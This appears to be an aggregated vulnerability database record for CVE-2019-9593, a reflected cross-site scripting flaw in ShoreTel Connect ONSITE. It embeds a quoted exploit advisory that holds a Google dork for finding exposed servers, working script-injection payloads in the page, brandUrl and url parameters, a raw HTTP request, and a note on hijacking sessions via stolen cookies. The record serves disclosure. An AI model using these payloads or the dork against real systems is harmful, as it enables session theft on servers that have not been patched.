ID
VAR-201903-0263
CVE
CVE-2019-9593
TITLE
Virtual Graffiti ShoreTel Connect ONSITE Cross-Site Scripting Vulnerability
Trust: 1.2
DESCRIPTION
A reflected Cross-site scripting (XSS) vulnerability in ShoreTel Connect ONSITE 18.82.2000.0 allows remote attackers to inject arbitrary web script or HTML via the page parameter. ShoreTel Connect ONSITE Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ShoreTelConnectDirector is a simple system management that allows users to control phones, permissions, applications, trunks, and voice switches through a web interface. # Exploit Title: Shoretel Connect Multiple Vulnerability # Google Dork: inurl:/signin.php?ret= # Date: 14/06/2017 # Author: Ramikan # Vendor Homepage: https://www.shoretel.com/ # Software Link: https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview # Version: Tested on 18.62.2000.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0 can be affected on other versions. # Tested on: Mozila Firefox 53.0.3 (32 bit) Browser # CVE :CVE-2019-9591, CVE-2019-9592, CVE-2019-9593 # Category:Web Apps Vulnerability: Reflected XSS and Session Fixation Vendor Web site: http://support.shoretel.com Version tested:18.62.2000.0, Version 19.45.1602.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0 Google dork: inurl:/signin.php?ret= Solution: Update to 19.49.1500.0 Vulnerability 1:Refelected XSS & Form Action Hijacking Affected URL: /signin.php?ret=http%3A%2F%2Fdomainname.com%2F%3Fpage%3DACCOUNT&&brand=4429769&brandUrl=https://domainname.com/site/l8o5g--><script>alert(1)</script>y0gpy&page=ACCOUNT Affected Parameter: brandUrl Vulnerability 2: Reflected XSS Affected URL: /index.php/" onmouseover%3dalert(document.cookie) style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b Affected Parameter: url Affected Version 19.45.1602.0 Vulnerability 3: Reflected XSS /site/?page=jtqv8"><script>alert(1)</script>bi14e Affected Parameter: page Affected Version:18.82.2000.0 GET /site/?page=jtqv8"><script>alert(1)</script>bi14e HTTP/1.1 Host: hostnamem User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://bdrsconference.bdrs.com/signin.php Cookie: PHPSESSID=2229e3450f16fcfb2531e2b9d01b9fec; chkcookie=1508247199505 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Vulnerability 4: Session Hijacking By exploiting the above XSS vulnerability, the attacker can obtain the valid session cookies of a authenticated user and hijack the session. PHPSESSID, chkcookie both cookies are insecure
Trust: 2.25
IOT TAXONOMY
| category: | ['Network device'] | sub_category: | - | Trust: 0.6 |
AFFECTED PRODUCTS
| vendor: | mitel | model: | connect onsite | scope: | eq | version: | 18.82.2000.0 | Trust: 1.8 |
| vendor: | virtual | model: | graffiti shoretel connect onsite | scope: | eq | version: | 18.82.2000.0 | Trust: 0.6 |
CVSS
SEVERITY | CVSSV2 | CVSSV3 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
|
PROBLEMTYPE DATA
| problemtype: | CWE-79 | Trust: 1.8 |
THREAT TYPE
remote
Trust: 0.6
TYPE
xss
Trust: 0.7
CONFIGURATIONS
PATCH
| title: | Top Page | url: | https://www.mitel.com/ | Trust: 0.8 |
| title: | Virtual Graffiti ShoreTel Connect ONSITE Security vulnerabilities | url: | http://123.124.177.30/web/xxk/bdxqById.tag?id=89850 | Trust: 0.6 |
EXTERNAL IDS
| db: | NVD | id: | CVE-2019-9593 | Trust: 3.1 |
| db: | PACKETSTORM | id: | 152431 | Trust: 1.7 |
| db: | EXPLOIT-DB | id: | 46666 | Trust: 1.6 |
| db: | JVNDB | id: | JVNDB-2019-002315 | Trust: 0.8 |
| db: | CNVD | id: | CNVD-2019-14967 | Trust: 0.6 |
| db: | CNNVD | id: | CNNVD-201903-177 | Trust: 0.6 |
REFERENCES
| url: | https://github.com/ramikan/vulnerabilities/blob/master/shoretel%20connect%20multiple%20vulnerability | Trust: 2.4 |
| url: | http://packetstormsecurity.com/files/152431/shoretel-connect-onsite-cross-site-scripting-session-fixation.html | Trust: 2.2 |
| url: | https://www.exploit-db.com/exploits/46666/ | Trust: 1.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2019-9593 | Trust: 1.5 |
| url: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9593 | Trust: 0.8 |
| url: | http://cve.circl.lu/cve/cve-2019-9593 | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/46666 | Trust: 0.6 |
| url: | http://support.shoretel.com | Trust: 0.1 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2019-9592 | Trust: 0.1 |
| url: | https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview | Trust: 0.1 |
| url: | https://domainname.com/site/l8o5g--><script>alert(1)</script>y0gpy&page=account | Trust: 0.1 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2019-9591 | Trust: 0.1 |
| url: | https://www.shoretel.com/ | Trust: 0.1 |
| url: | http://bdrsconference.bdrs.com/signin.php | Trust: 0.1 |
CREDITS
Ramikan
Trust: 0.7
SOURCES
| db: | CNVD | id: | CNVD-2019-14967 |
| db: | JVNDB | id: | JVNDB-2019-002315 |
| db: | PACKETSTORM | id: | 152431 |
| db: | CNNVD | id: | CNNVD-201903-177 |
| db: | NVD | id: | CVE-2019-9593 |
LAST UPDATE DATE
2024-11-23T21:52:27.996000+00:00
SOURCES UPDATE DATE
| db: | CNVD | id: | CNVD-2019-14967 | date: | 2019-05-22T00:00:00 |
| db: | JVNDB | id: | JVNDB-2019-002315 | date: | 2019-04-05T00:00:00 |
| db: | CNNVD | id: | CNNVD-201903-177 | date: | 2022-10-08T00:00:00 |
| db: | NVD | id: | CVE-2019-9593 | date: | 2024-11-21T04:51:55.493 |
SOURCES RELEASE DATE
| db: | CNVD | id: | CNVD-2019-14967 | date: | 2019-05-22T00:00:00 |
| db: | JVNDB | id: | JVNDB-2019-002315 | date: | 2019-04-05T00:00:00 |
| db: | PACKETSTORM | id: | 152431 | date: | 2019-04-07T03:33:33 |
| db: | CNNVD | id: | CNNVD-201903-177 | date: | 2019-03-06T00:00:00 |
| db: | NVD | id: | CVE-2019-9593 | date: | 2019-03-06T16:29:00.380 |